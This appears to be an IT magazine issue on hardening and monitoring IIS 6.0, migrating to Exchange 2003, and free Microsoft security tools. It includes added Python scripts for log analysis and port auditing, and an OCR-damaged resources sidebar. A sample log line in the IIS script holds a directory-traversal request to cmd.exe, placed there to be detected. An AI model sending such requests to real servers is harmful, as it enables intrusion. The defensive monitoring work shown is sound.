As part of the IIS 6.0 Resource Kit (support.microsoft.com/?id=840671) you'll find a very cool utility called Log Parser 2.1. This tool allows you to query many log files, text files, and other items too numerous to mention using a SQL query (Microsoft SQL Server is not required). Copy Logparser.exe and the script extensions.qry into the folder that contains the log files you want to analyze, and then run the following query from a command line in the log folder:

Logparser file:extensions.qry

This will create a unique list of all the file extensions that are involved in your real-world IIS server. On my machine, this results in the output shown in Figure 2. Because the list is built from recorded traffic, make sure the logs you analyze cover a long enough period to include applications that are used only occasionally (month-end jobs, for example); anything missing from the list will be blocked once you lock the server down.

With this info in hand, you can run another query on each executable file extension to identify URL paths to all your executables. To do this using Log Parser 2.1, type the following query (or modify extensions.qry) into Notepad and save it as extensions-uri.qry. This query looks more involved than it is, and with Log Parser 2.2 (due for release Fall 2004, and adding an EXTRACT_EXTENSION function) it can be greatly simplified. In the meantime, the following query should work:


SELECT DISTINCT cs-uri-stem,
       SUBSTR(cs-uri-stem,
              LAST_INDEX_OF(cs-uri-stem, '.'),
              STRLEN(cs-uri-stem)) AS Extension
FROM ex*.log
WHERE Extension = '.dll'
  AND cs-method = 'GET' AND sc-status = 200
ORDER BY cs-uri-stem


With this query in hand, you can run it with the following command:

Logparser file:extensions-uri.qry

After the query has finished executing, you'll see output that looks something like Figure 3.
With just a few tweaks, you could use these same queries to scan your entire Web server farm. If you're a TechNet subscriber and you'd like to learn more about the Log Parser tool, you'll find a white paper introducing the tool in the April 2004 edition of the TechNet subscription available on CD, along with a beta version of Log Parser 2.2 on the Downloads CD.

Figure 3 Executable Paths

cs-uri-stem                         Extension
/_vti_bin/SHTML.dll                 .dll
/_vti_bin/_vti_adm/admin.dll        .dll
/_vti_bin/_vti_adm/fpadmdll.dll     .dll
/_vti_bin/_vti_aut/author.dll       .dll
/_vti_bin/shtml.dll                 .dll


Now you know how to use WSE to get your IIS 6.0 applications online and more secure. Adding entries to the list and allowing new applications to run is a simple process using the IIS Manager or the iisext.vbs script.


MIMEMaps

IIS 6.0 will not deliver static content for which there is no MIMEMap entry. This is a new security feature: a file whose extension is not in the MIME types list is not served at all, whether or not the file type is otherwise well known. Compare IIS 5.0: if you placed new scripts on the server for a file type that was undefined, IIS 5.0 would deliver the content as plain text until the application mapping had been installed, which hands the script source (and any connection strings or logic inside it) to whoever asks for the file. The same thing could happen if a script engine was uninstalled while the related scripts were left on the server. IIS 6.0 refuses both requests instead.
You can view the list of defined MIME types by opening the IIS Manager, right-clicking on the computer icon, selecting Properties, and clicking the MIME Types button (see Figure 4).

Reviewing the list of file extensions you generated with the Log Parser tool from your existing IIS log files, if you find any MIME types that are legitimately required, you will need to add them to the MIME types list in IIS 6.0. Add each extension individually; registering a wildcard (*) extension as application/octet-stream makes every file on the server downloadable and throws the feature away. While you are there, because you also know from the Log Parser list what isn't in use, you can safely remove any of those MIME types that are defined but that aren't being used (and most likely there will be many). Of course, it's always a good idea to make a complete backup of the metabase first in the unlikely event that you delete something you need.


Undefined MIME Types/Web Service Extensions

Let's say that one day after installing your IIS 6.0 servers, a user contacts you and says they are getting a 404 File Not Found message. You verify that the file is on the IIS server and that the user has rights to access the file. You try to request the file, and you get the same result: file not found. You restart the server to clear any problems, but it has no effect.

This exact scenario occurs when you try to access a file that is an undefined MIME type or an extension that is requested but not defined in the WSE. In both cases, the requested file can exist on the server with proper permissions, but IIS will return to the user a simple and intentionally misleading 404 File Not Found message.


Figure 4 MIME Types (the Registered MIME types list, one extension and MIME type per row, for example .aif audio/aiff and .asf video/x-ms-asf, with the MIME type details dialog for entering an Extension and a MIME type)


Figure 5 Logging Properties (Advanced tab, Extended logging options: Date (date), Time (time), Client IP Address (c-ip), User Name (cs-username), Service Name (s-sitename), Server Name (s-computername), Server IP Address (s-ip), Server Port (s-port), Method (cs-method), URI Stem (cs-uri-stem), URI Query (cs-uri-query), Protocol Status (sc-status), Protocol Substatus (sc-substatus), Win32 Status (sc-win32-status), Bytes Sent (sc-bytes))
Wouldn't it be nice if you had a quick way to determine if a 404 File Not Found message is returned because the file is actually missing, or is one of these two special cases? Your wish is granted! The IIS W3SVC log file on IIS 6.0 has a new field called the sub-status code that can specifically identify when a 404 error occurs because of a MIME type or WSE. To use the field, simply enable it in the log file Advanced properties page (see Figure 5). Right-click on a Web site in the IIS Manager, select Properties, click on the Properties button on the Web Site tab, then click on the Advanced tab. Note that this field is only available when your log files are set to W3C Extended Log File Format. The sidebar entitled "Sub-Status Error Codes" lists the error codes that may get logged. Inspecting the contents of the sc-status field for 404 errors and the sc-substatus field for the values 2 (Web Service Extension lockdown) and 3 (MIME map policy), that is, errors 404.2 and 404.3, would quickly identify the problem in our example. The client never sees the sub-status, which is exactly the point: the log tells you the truth while the browser is told only "not found."

An Entirely New Log File

Since we're talking about log files, for security and troubleshooting purposes you should know about an entirely new log file available from IIS 6.0. A brief explanation helps to explain why this log is necessary.

IIS 6.0 contains a kernel-mode HTTP parsing engine and cache called http.sys. When the http.sys listener encounters an error, it requires a place to record it, and so its developers invented the httperr(x).log files, which you can find in \system32\logfiles\httperr. Httperr logs have an entry when requests are rejected by http.sys. Http.sys, which hands off requests to IIS 6.0 applications, won't take requests that do not meet specific criteria. Client requests for content must be well-formed HTTP (1.0 or 1.1), meet size constraints, not have any high-order bit characters, and not violate other well-defined rules (see support.microsoft.com/?id=820129 for information on configurable parameters). Because these requests are dropped before they ever reach the W3SVC site log, the httperr log is the only place they appear, so an attacker probing the server will almost certainly leave tracks there; be sure to include a review of the httperr logs located at \system32\logfiles\httperr in your regular monitoring tasks.
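The following Python script is an added example, not code from the article or from Log Parser: it re-implements, over constructed sample log lines embedded in the script, the checks discussed in the Log Parser, sub-status and httperr passages above. It reproduces the two Log Parser queries (the unique-extension inventory of Figure 2 and the executable-path list of Figure 3, generalized to every executable extension at once and to POST as well as GET), picks out the 404.2 and 404.3 policy denials from the sc-substatus field, and summarizes http.sys rejections from the httperr log by reason and by client. Field names are read from each log's own #Fields line, so it works with whatever fields you have enabled; the executable-extension set and the set of benign httperr reasons are assumptions to adjust for your server.

```python
"""Offline re-implementation of the IIS 6.0 log checks described in this article.
Added example, not code from the article or from Log Parser; the sample log
lines below are constructed for this example and come from no real server."""
from collections import Counter
from typing import Dict, List

# Assumption: extensions handled by ISAPI/CGI on this server, which therefore
# need Web Service Extensions entries. Adjust to what your inventory shows.
EXECUTABLE_EXTENSIONS = {".dll", ".exe", ".asp", ".aspx", ".php"}
# Assumption: httperr reasons that are connection housekeeping, not bad input.
BENIGN_HTTPERR_REASONS = {"Timer_ConnectionIdle"}

# Constructed W3C Extended lines: IIS 6.0 default fields plus sc-substatus,
# which has to be enabled in Logging Properties as the article explains.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-01-10 00:00:01 10.0.0.5 GET /default.htm - 80 - 192.168.1.20 Mozilla/4.0 200 0 0
2005-01-10 00:00:02 10.0.0.5 GET /images/logo.JPG - 80 - 192.168.1.20 Mozilla/4.0 200 0 0
2005-01-10 00:00:03 10.0.0.5 GET /_vti_bin/shtml.dll /_vti_rpc 80 - 192.168.1.20 Mozilla/4.0 200 0 0
2005-01-10 00:00:04 10.0.0.5 POST /_vti_bin/_vti_aut/author.dll - 80 - 192.168.1.20 Mozilla/4.0 200 0 0
2005-01-10 00:00:05 10.0.0.5 GET /scripts/Report.exe - 80 - 192.168.1.21 Mozilla/4.0 200 0 0
2005-01-10 00:00:06 10.0.0.5 GET /orders/invoice.asp id=7 80 - 192.168.1.21 Mozilla/4.0 200 0 0
2005-01-10 00:00:07 10.0.0.5 GET /downloads/data.xyz - 80 - 192.168.1.22 Mozilla/4.0 404 3 0
2005-01-10 00:00:08 10.0.0.5 GET /legacy/old.php - 80 - 192.168.1.22 Mozilla/4.0 404 2 0
2005-01-10 00:00:09 10.0.0.5 GET /missing.htm - 80 - 192.168.1.22 Mozilla/4.0 404 0 2
"""

# Constructed httperr lines in the HTTP API log's default field order.
SAMPLE_HTTPERR_LOG = """\
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2005-01-10 00:01:00 192.168.1.30 3312 10.0.0.5 80 - - - - - Timer_ConnectionIdle -
2005-01-10 00:01:05 192.168.1.40 3320 10.0.0.5 80 HTTP/1.1 GET /scripts/..%c0%af../cmd.exe 400 - URL -
2005-01-10 00:01:06 192.168.1.40 3321 10.0.0.5 80 HTTP/1.1 GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 414 - URL_Length -
2005-01-10 00:01:07 192.168.1.40 3322 10.0.0.5 80 - - - 400 - BadRequest -
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse a W3C Extended log (IIS and httperr share the format); field names
    come from the '#Fields:' directive, so any chosen field layout works."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if len(values) != len(fields):
                raise ValueError("field count mismatch: %r" % line)
            records.append(dict(zip(fields, values)))
    return records


def extension_of(uri_stem: str) -> str:
    """Same idea as the article's SUBSTR/LAST_INDEX_OF: text from the last '.' of
    the file name, lower-cased because IIS matches extensions regardless of case."""
    name = uri_stem.rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""


def unique_extensions(records: List[Dict[str, str]]) -> Counter:
    """Figure 2 equivalent: number of requests per extension."""
    return Counter(extension_of(r["cs-uri-stem"]) for r in records)


def executable_paths(records: List[Dict[str, str]],
                     extensions=EXECUTABLE_EXTENSIONS) -> Dict[str, List[str]]:
    """Figure 3 equivalent for every executable extension at once. Unlike the
    article's query it keeps POST as well as GET (a POST to author.dll needs a
    WSE entry just the same) and merges case variants of one path."""
    paths: Dict[str, set] = {}
    for r in records:
        ext = extension_of(r["cs-uri-stem"])
        if ext in extensions and r["sc-status"] == "200":
            paths.setdefault(ext, set()).add(r["cs-uri-stem"].lower())
    return {ext: sorted(p) for ext, p in paths.items()}


# sc-status/sc-substatus pairs meaning "blocked by policy", not "file missing".
POLICY_DENIALS = {("404", "2"): "Web Service Extension lockdown policy",
                  ("404", "3"): "MIME map policy"}


def denied_by_policy(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """The article's two special 404 cases, read from the log rather than
    guessed from the deliberately vague 'File Not Found' the client sees."""
    return [{"path": r["cs-uri-stem"], "reason": POLICY_DENIALS[key]}
            for r in records
            for key in [(r["sc-status"], r.get("sc-substatus", "0"))]
            if key in POLICY_DENIALS]


def httperr_summary(records: List[Dict[str, str]]) -> Dict[str, Counter]:
    """Count http.sys rejections by reason, and by client with housekeeping
    entries removed, so a client sending malformed requests stands out."""
    by_reason = Counter(r["s-reason"] for r in records)
    by_client = Counter(r["c-ip"] for r in records
                        if r["s-reason"] not in BENIGN_HTTPERR_REASONS)
    return {"by_reason": by_reason, "by_client": by_client}


if __name__ == "__main__":
    iis = parse_w3c(SAMPLE_IIS_LOG)
    print("Extensions:", unique_extensions(iis).most_common())
    print("Executables:", executable_paths(iis))
    print("Policy denials:", denied_by_policy(iis))
    print("http.sys rejections:", httperr_summary(parse_w3c(SAMPLE_HTTPERR_LOG)))
```

To run it against a real server, pass the contents of an ex*.log or httperr*.log file to parse_w3c instead of the embedded samples; the samples exist only so that the script runs stand-alone. Note that a MIME or WSE denial appears in the site log with status 404 and sub-status 2 or 3, whereas requests http.sys refuses never reach that log at all, which is why the two logs have to be checked separately.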


IIS 6.0 and NTFS Permissions

Many IIS servers store content in and under the \inetpub\wwwroot folder. With IIS 6.0, the wwwroot folder has tighter permissions than with previous versions of IIS, and you may need to make some modifications in order to once again get your applications working effectively. For example, the IIS anonymous user account is given the Deny Write permission. You might need to modify this permission for certain scripts to work that need write permission for Web Forms or for other applications that write to files in the context of the anonymous user. If you do, grant write access only on the specific folder the application writes to, and make sure that folder has no script or execute permission in IIS; a folder that anonymous users can both write to and execute from is an invitation to upload and run code.

Another more common problem arises when you don't use the \inetpub\wwwroot folder for content. There is a new group in IIS 6.0 called IIS_WPG that will require at least read access to your entire site's content when you run ASP.NET applications. Failure to grant it will result in the return of an ASP.NET error message similar to the following:

Exception Details:
System.UnauthorizedAccessException: Access to
the path "D:\data\txtinv.txt" is denied.

ASP.NET is not authorized to access the
requested resource.

Allowing IIS_WPG access to all your Web content will avoid this and other related problems. Read (and List Folder Contents) is what it needs; the worker process should be able to read your application, not rewrite it.

Wrap Up

If you're like me, when I first opened the IIS 6.0 user interface, I was surprised at how familiar it was. Of course, this isn't a complete review, but these issues are at the top of the list of new security-related tasks for administering IIS 6.0. I would be remiss without mentioning that you should always keep your server(s) fully patched (make sure you visit Windows Update frequently) and that you should continue to monitor for unusual activity. Don't forget to check out the aforementioned Log Parser tool, as it will make your IIS-related tasks easier. Also, keep an eye out for other new and exciting tools to assist with keeping your IIS servers running smoothly and securely.


Sub-Status Error Codes

The following list details the sub-status codes that were added for troubleshooting specific situations:

401.7   URL authorization (URLAuthZ) denied due to policy
403.20  Passport login failure
404.2   Denied due to lockdown policy (Web Service Extensions)
404.3   Denied due to MIME policy
500.16  UNC username/password incorrect
500.17  URLAuthZ store not found
500.18  URLAuthZ store cannot be opened
500.19  Bad file metadata (the file's metabase configuration is invalid)
500.20  URLAuthZ scope not found



Jenna Lyday

15 Tips for a Smooth Migration to Exchange Server 2003

If you've heard that it's difficult to migrate from Exchange 5.5 to Exchange Server 2003, don't worry; there are steps you can take to simplify the upgrade process. While the list that follows does not represent an exhaustive Exchange deployment plan, it does represent the situations we often see in customer environments that adversely affect the deployment process.

1. Use the Microsoft Exchange Server Deployment Tools. These are new in the 2003 release of Exchange Server, and will greatly help in guiding you through a successful deployment process. Included is an array of tools designed to diagnose and/or verify a wide variety of conditions that you might encounter.

2. Keep in mind that Exchange Server 2003 makes widespread use of DNS in all its sundry forms. Because Exchange is a major consumer of DNS, it will quickly and effectively expose any related issues. Steps 3 through 8 will help you ensure DNS is ready before installing Exchange Server. (For more about DNS, see the How IT Works column by Regis Donovan in this issue.)

3. Confirm that your Mail Exchange (MX) records are pointing to the correct server or IP address.

4. Verify that your DNS server is configured to use forwarders for addresses it is unable to resolve internally, instead of being pointed directly to an external DNS resolver. This is a good rule in general.

5. Check that your local member servers are pointed to your local DNS server and not to an external resolver. The trick here is that you want to be able to find the other machines on your LAN and not just machines on the Internet.

6. Certify that the Domain Controller (DC) acting as your schema master is using a DNS server that is accessible by your local servers. If the schema master is the DNS server, make sure that it is configured to use its own IP address for DNS and is the preferred DNS server of the member servers.

7. Confirm on the first page of Properties on the zone that your DNS server is configured to Allow Dynamic Update.

8. Verify that your DNS records contain entries under the domain labeled _msdcs, _sites, _tcp, and _udp, in addition to the Host records. If you do not see these entries and have already verified that Dynamic Update is enabled, go to your DCs and type "net stop netlogon" followed by "net start netlogon" from a command prompt. This will restart the Netlogon service and cause the DC to reregister its service resource records (SRV records).

9. Verify that you can resolve the name of your mail server and your DC(s) by both short name and Fully Qualified Domain Name (FQDN).

10. Ensure that the first Exchange 2003 server that you install is not a cluster if your current e-mail environment contains Exchange 5.5 and no subsequent Exchange versions. Some Exchange services are supported on a cluster, but some are not. One of the services not supported on a cluster is the Site Replication Service (SRS), which allows Exchange 2003 and Exchange 5.5 to be on speaking terms. It's important that the first server that goes in is able to create the SRS and start communications.

11. Install the Active Directory Connector (ADC) and configure Connection Agreements (CAs) if your Exchange organization is Exchange 5.5. I strongly recommend that you use the ADC Tools, included with your ADC installation, to generate these CAs.

12. Check that all ADC servers are upgraded to the proper Exchange 2003 version before you embark on your Exchange 2003 rollout if you are upgrading from Exchange 2000 mixed mode. I also strongly recommend that after upgrading your ADC servers you use the ADC Tools to revalidate any existing CAs.

13. Remember that if you have third-party applications running on your Exchange server, you should check with your vendor to confirm that they have a compatible version available, and acquire it for installation on your new Exchange server. If your migration is an upgrade of an existing Exchange deployment, uninstall your third-party applications prior to the upgrade and reinstall the new version after the upgrade. (Note: upgrading to Microsoft Exchange 2003 is supported only on an Exchange 2000 server.)

14. If you are upgrading from Exchange 2000, verify that you account for services that are no longer supported in Exchange 2003. These include: Microsoft Mobile Information Server, Instant Messaging Service, Exchange Chat Service, Exchange 2000 Conferencing Server, Key Management Service, cc:Mail connector, and MS Mail connector. If any of these services are running on the Exchange server you plan to upgrade, you should remove them with Exchange setup before you move on. If you're going to need any of these services, you will need to keep at least one Exchange 2000 server available to run the service.

15. Make sure the time on the server that you are installing on is in sync with the time on your DCs. If the time is off by more than five minutes (the default Kerberos clock skew tolerance), Kerberos authentication will fail and you won't be able to perform any operations that require permissions on the Active Directory. If the times are out of sync, you can type "net time /set \\<DomainController>" from the command prompt on the Exchange server to fix it.

Comprehensive information about planning an Exchange deployment is available from the Exchange Server 2003 Technical Documentation Library (www.microsoft.com/technet/prodtechnol/exchange/2003/Library/default.mspx), where you can find resources such as Planning an Exchange Server 2003 Messaging System and Exchange Server 2003 Deployment Guide. In addition, in the 2003 release of Exchange Server you'll find deployment tools, which will further help in guiding you through a successful deployment process. But to start, consider these 15 guidelines and you'll have a smoother transition to Exchange Server 2003.

Jenna Lyday is a Software Test Engineer on the Microsoft Exchange team, where she has been testing Exchange deployments for the last four years. Previously, she was an Exchange administrator.



Kai Axford

Six Free Microsoft Security Resources

Free? Just hearing that word on the radio or TV makes me cringe. Like you, I'm an IT professional. I'd be interested if one of the big hardware vendors decided to pass out free 20,000 RPM SCSI drives along with a fiber channel SAN, but that's about it. So why in the world am I telling you about free stuff in this column? Well, because at Microsoft, we've got some amazing free security tools and whitepapers. If you fail to check them out, you're going to kick yourself just like you would if you missed out on a free SCSI drive. I do a lot of presentations and webcasts, and I've noticed that many IT pros have never heard of these tools. To be honest with you, that's a travesty. This stuff is available now, you can get it today, and it's a whole lot more valuable than a SCSI drive.

Microsoft Baseline Security Analyzer

How would you like a tool that will help you assess some of the common security misconfigurations on your machines? The Microsoft Baseline Security Analyzer (MBSA) is for you. MBSA is a best practices vulnerability assessment tool for the Microsoft platform. Once you install the MSI package locally (and as long as you have admin privileges on the machines you scan), you can use it to scan multiple machines from just that one central location. MBSA runs on Windows 2000, Windows XP, and Windows Server 2003. It can be used in GUI or command-line modes (for all you scripting gurus). It can also be used in conjunction with SMS.

As of this writing, the current version, MBSA 1.2.1, will scan the core operating system and a variety of applications (IIS, Exchange Server, SQL Server, Office, BizTalk Server, and Commerce Server, for example). MBSA will then save these scans in a neat little XML report that you can view immediately or save for future use.

Now you might ask, "Is this one of those tools that I have to be able to read binary to understand?" The answer is absolutely not! The reports generated by this tool are simple to read and are easily understood by an IT pro. It uses a few simple colored icons to distinguish results: green (looking good!), yellow (warning: this has the potential to be bad), red (danger! danger! impending doom!), or blue (are you following the best practice here?). Basically, if you can drive a car, you can understand this tool, although if you see a blue flashing light, it's better just to pull over and not debate whether you were following a "best practice."

You can find out more information about MBSA and download it from www.microsoft.com/technet/security/tools/mbsahome.mspx.

Software Update Services with SP1

Patch management. It's a necessary task, but it shouldn't be a lifestyle. How you deploy patches in your organization directly affects your ability to get out of the office by 4:00 PM. If users install patches in your organization, you might wonder if this is something you really want to leave in the hands of people who only care about e-mail, solitaire, and instant messaging.

How do your users typically deploy their patches? They go to Windows Update and Select All, then they roll out all 90 updates onto their desktops at once. Have you ever heard a user say, "I really should test this patch in a controlled lab setting before deploying it to my desktop"? Almost never. They simply dump patch after patch onto their machines and reboot. If some obscure application doesn't work afterward, well, they just think it's the fault of the patches, but you'll get a big helping of blame, too.

Enter Software Update Services with SP1 (SUS), another free tool from Microsoft. Once loaded onto Windows 2000 or Windows Server 2003, it allows you to control patch deployments in your organization. SUS will pull down from the net all critical patches, security packs, and security updates that are currently available. Then you can selectively test and deploy those needed in your organization.

In addition, through either Group Policy Objects or a client registry setting, you can force the Automatic Updates client to point only to your SUS server for updates. You can also set the parameters regarding how and when the updating process occurs.

Watch for the next version of SUS, which will be called Windows Update Services. This new version, due out in the first half of 2005, will give you the ability to update drivers, noncritical patches, and so on. Updates that do not require a reboot can be configured to be installed silently without user interaction or notification (we all know we don't want users determining what's best). Updates that do require a reboot will be grouped together so a single reboot accomplishes the task. Finally, the logging and reporting features will be greatly improved.

Port Reporter

We all are familiar with Windows services and TCP ports and the like. (If you're not, then you are probably in marketing and can stop reading. Put down the magazine and slowly walk away from the Network Administrator's office.) Tools like NetStat can tell you which ports are open on a machine, but did you ever wonder exactly which process is listening on what port or whether it was a process at all? Check out the new Port Reporter at support.microsoft.com/?id=837243. The tool logs TCP and UDP port activity and provides you with a useful logfile.

The newly released Port Reporter Parser tool (support.microsoft.com/?id=884289) can help you quickly scan through these logfiles. It is a GUI-based tool that can scan based on IP addresses, ports, services, user accounts, host names, and so on. This is great for doing things like computer forensics and incident response or for just proving that you're right to a bunch of marketing people.

Kai Axford, CISSP, MCSE-Security, has been with Microsoft for the past five years as a support engineer and TechNet speaker. He is currently serving as a Lead Security Presenter and speaks to thousands of IT pros at live events. Reach Kai at kaiax@microsoft.com.
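As an added example that is not from the column or from Port Reporter, the following Python script does the point-in-time version of what Port Reporter records continuously: it joins the output of netstat -ano (which on Windows XP and Windows Server 2003 includes the owning PID) with tasklist /fo csv to name the process behind every listening port, and flags ports outside an allowed set. A listener whose PID tasklist does not know is reported as such rather than dropped, since a process that vanished between the two snapshots, or one that is being hidden, is exactly what an incident responder wants to see. The netstat and tasklist text below is constructed for the example, and the allowed-port set is an assumption to replace with your server's documented services.

```python
"""Name the process behind every listening port from netstat and tasklist output.
Added example, not from the column or from Port Reporter; the netstat and
tasklist text below is constructed for this example."""
import csv
import io
from typing import Dict, List, Set, Tuple

# Constructed 'netstat -ano' output (Windows XP / Windows Server 2003 layout).
SAMPLE_NETSTAT = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1744
  TCP    10.0.0.5:3389          192.168.1.20:2033      ESTABLISHED     1208
  UDP    0.0.0.0:445            *:*                                    4
  UDP    10.0.0.5:123           *:*                                    1040
"""

# Constructed 'tasklist /fo csv' output; note that PID 1744 is absent.
SAMPLE_TASKLIST = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Console","0","236 K"
"svchost.exe","892","Console","0","4,520 K"
"svchost.exe","1040","Console","0","3,180 K"
"svchost.exe","1208","Console","0","6,004 K"
"""

Listener = Tuple[str, int, str, str]  # (proto, port, pid, image name)


def parse_netstat(text: str) -> List[Dict[str, str]]:
    """One dict per socket line. UDP lines have no State column, so the PID is
    taken from the end of the line and a bound UDP socket counts as listening."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, column header and blank lines
        state = parts[3] if parts[0] == "TCP" else "LISTENING"
        rows.append({"proto": parts[0], "local": parts[1],
                     "state": state, "pid": parts[-1]})
    return rows


def parse_tasklist(text: str) -> Dict[str, str]:
    """PID -> image name from 'tasklist /fo csv'."""
    return {row["PID"]: row["Image Name"]
            for row in csv.DictReader(io.StringIO(text))}


def listeners_by_process(netstat: str, tasklist: str) -> List[Listener]:
    """Every listening socket with the name of its owner, sorted by port. A PID
    tasklist does not know is kept and labelled: the process either exited
    between the two snapshots or is being hidden, and both deserve a look."""
    names = parse_tasklist(tasklist)
    out: List[Listener] = []
    for row in parse_netstat(netstat):
        if row["state"] != "LISTENING":
            continue
        port = int(row["local"].rsplit(":", 1)[1])  # also handles [::]:80
        out.append((row["proto"], port, row["pid"],
                    names.get(row["pid"], "<no such process>")))
    return sorted(out, key=lambda l: (l[1], l[0]))


def unexpected_listeners(listeners: List[Listener],
                         allowed_ports: Set[int]) -> List[Listener]:
    """Listeners on ports outside the server's documented set: the first
    question to answer on a box suspected of being compromised."""
    return [l for l in listeners if l[1] not in allowed_ports]


if __name__ == "__main__":
    found = listeners_by_process(SAMPLE_NETSTAT, SAMPLE_TASKLIST)
    for proto, port, pid, image in found:
        print(f"{proto:3} {port:5} pid={pid:5} {image}")
    # Assumption: ports this server is documented to serve.
    print("unexpected:", unexpected_listeners(found, {80, 123, 135, 445}))
```

On a live machine, capture the two outputs with netstat -ano > netstat.txt and tasklist /fo csv > tasks.txt, taken as close together as possible, and feed the file contents to listeners_by_process; Port Reporter is still the better answer for the history of which process held a port at a given time, which a snapshot cannot give you.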


Security Events

Microsoft spent a lot of money getting the security message out to the IT pro community. In five months, we've reached more than 500,000 IT pros worldwide. We've done summits, roadshows, forums, briefings, webcasts, and eLearning. We plan on continuing our security push well into next year. Be sure to check out the live shows, but if we miss your town or if you miss us while we're in town, then catch the security webcasts. There's no excuse for not getting this info! (Trust me, we'll have you home by 4:00 PM.)

For more information on Microsoft security events, see www.microsoft.com/seminar/events/security/default.mspx.


Windows XP SP2

I'm sure that by now you've already tested and diligently loaded Windows XP SP2 onto all your clients. So let's move on... just kidding. I realize from talking with many of you in the field that many of you are still in the testing process (testing is good!), but unfortunately you cannot sit back and not deploy SP2 simply because it causes the "Sr. Executive Golf Score Tracking Tool" to hiccup. At some point, you need to get patches out of the lab and into production. Remember, you're in a race with all those malicious worm and virus writers, so test and move! This is especially important with Windows XP SP2 since it offers some really amazing advances in browser safety, network protection, memory protection, and safer e-mail handling, among other things. If you're concerned that your corporate customers will get this through Automatic Update before you can test it, Microsoft has actually provided a tool that will block SP2 deployment via Automatic Update until April 12, 2005. That buys you an additional six months of testing time! That tool is available at www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2aumng.mspx.

So don't just test it, deploy it! Your users will thank you (which, as we all know, is a rare experience). You can then get back to more important things, like figuring out exactly how many 20,000 RPM SCSI drives you'll need to hold all of your vacation pictures. For more info on Windows XP SP2, visit www.microsoft.com/technet/prodtechnol/winxppro/maintain/winxpsp2.mspx.

Windows XP and Windows Server 2003 Security Guides

Finally, I need to mention some of the excellent security guides and whitepapers that have been assembled by some of the smartest guys I know. These docs contain a wealth of knowledge and answers to almost every Windows-based security configuration question I get. The Windows XP Security Guide contains detailed information on security settings in Group Policy ("What the heck is the difference between Audit Account Logon versus Audit Logon?"), securing standalone clients, and how to configure a Software Restriction Policy ("They'll never play solitaire again! Bwahahaha!"). Not only does the Guide discuss these things, it provides templates, checklists, scripts, and so on to assist you in rolling it out. The guide has been updated to include Windows XP SP2-related material, so go get this today! (Or send your junior admin to get it... they enjoy that sort of stuff.)

The Windows Server 2003 Security Guide outlines best practices for configuring your domain infrastructure as well as specifics on setting up your IIS, file, print, IAS, and infrastructure servers. It provides a stack of templates and tools that pertain directly to servers (and everyone loves servers). You will definitely want to get these guides!




In today’s business environment, most 


organizations are using Web servers | 


to extend products and services to 
both internal and external customers. 
At the same time, attackers are in- 


creasing their relentlessness and so- | 


phistication. To enable secure Web 
infrastructures based on reliable, high- 
performance Web server platforms, 
Microsoft built IIS 6.0 from the ground 
up with a focus on security as a core 
design criterion. 

Although security is a critical topic 


in the field of information technology 
today, few IT professionals have the 
time to dig through the volume of 
information available on MSDN®, 
TechNet, the IIS Technology Center 
on Microsoft.com (www.microsoft.com/iis), 
and elsewhere. 

However, the relatively new Web 
site TryllS.com simplifies searching by 
providing a collection of valuable, se- 
curity-focused IIS 6.0 overviews and 
technical resources, summarized at 
www.tryiis.com/Security.asp. The various of- 


IIS 6.0 Security 
Phil Sherwood 


ferings range from executive and tech- 
nical webcasts, papers for both tech- 
nical and business management 
personnel, FAQs, detailed technical 
IIS 6.0 documentation, and links to 
other focused online security centers. 

The following is a sample of what's 
available on TryllS.com. 


Phil Sherwood (pts@centurytel.net) is principal of Witan Consulting, which provides technical and marketing writing, product and program management, and general business management support to both small businesses and large technology development companies.


Looking for IIS resources that you can access offline from your Tablet PC or stuff into your pocket and reference on the subway? A white paper, several technical papers, and a magazine article all examine Windows Server™ 2003 and IIS 6.0 security capabilities in different levels of detail. A short collection of FAQs also provides some brief explanations of IIS components.

Starting on the less technical side, Understanding Internet Information Security provides an overview of the IIS security model. This is a manageable introduction for those on the business side and can serve as a quick, high-level scan and refresher for the more technical types. See www.microsoft.com/ntserver/techresources/webserv/iissecure.asp, but note that the text on the page is a truncated version of the Word document downloadable from the link towards the top of the page. It's worth the time to download and print the .doc file, 19 nicely formatted pages in total, about 10 of which contain the meat and potatoes of the subject.

Also a discussion of the IIS security model (but at the code level and assuming the reader's substantial technical familiarity with IIS and Windows NT®) is For Developers: Understanding IIS Security Code at msdn.microsoft.com/library/en-us/dniis/html/iissecure.asp. It's drawn from the MSDN library and amounts to about 10 pages of text. After dispensing with some very high-level questions ("Why Security Is Important," for example), it digs into more nuts-and-bolts topics such as authentication, access control and related considerations, data integrity, digital certificates, and the CryptoAPI.

Still more technically substantial and running close to 40 pages is Technical Overview of Windows Server 2003 Security Services, published in July 2002. The table of contents appears on www.microsoft.com/windowsserver2003/techinfo/overview/security.mspx; the paper itself also provides an extensive collection of links. Within the overview, the paper discusses the security-related Windows Server tools and processes: authentication, access control, security policy, auditing, Active Directory® data protection, network data protection, public key infrastructure (PKI), and trusts. Although the mentions of IIS are contained on pages 4 and 5, the Windows Server 2003 content that makes up the majority of the article covers the strong foundation on which IIS is built.

